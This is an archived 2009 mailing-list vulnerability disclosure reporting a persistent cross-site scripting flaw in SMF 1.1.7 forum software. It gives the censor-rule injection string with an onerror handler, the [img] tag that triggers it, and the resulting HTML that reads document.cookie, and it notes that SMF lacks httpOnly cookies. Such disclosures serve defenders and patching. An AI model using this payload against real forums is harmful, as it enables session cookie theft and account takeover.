lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <8ba534860902030056n617c1d98w9edb4263c7f389d7@mail.gmail.com>
Date: Tue, 3 Feb 2009 02:56:37 -0600
From: Eduardo Vela <sirdarckcat@...il.com>
To: submit@...w0rm.com, full-disclosure@...ts.grok.org.uk,
	bugtraq@...urityfocus.com
Subject: SMF 1.1.7 Persistent XSS (requires permision to edit censor)

SMF 1.1.7 (simplemachines.org) XSS

Exploitation:

If you can modify the censor on a SMF forum, then you can make it
execute arbitrary JS code.
http://SMF.Forum.com/index.php?action=postsettings;sa=censor

Just add the following entry:
http://www.test.xss/ => http://www.test-xss/" onerror="alert(document.cookie)

And then write a post, modify your signature, or send a PM with the code:
[img]http://www.test.xss/[/img]

And the HTML code generated will be..
<img src="http://www.test-xss/" onerror="alert(document.cookie)"
alt="" border="0" />

Notes:
 - SMF is not using httpOnly cookies.
 - I'm going full disclosure with this because I've had bad
experiences with the SMF team when reporting vulnerabilities..

Greetings!!
-- Eduardo
http://www.sirdarckcat.net/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ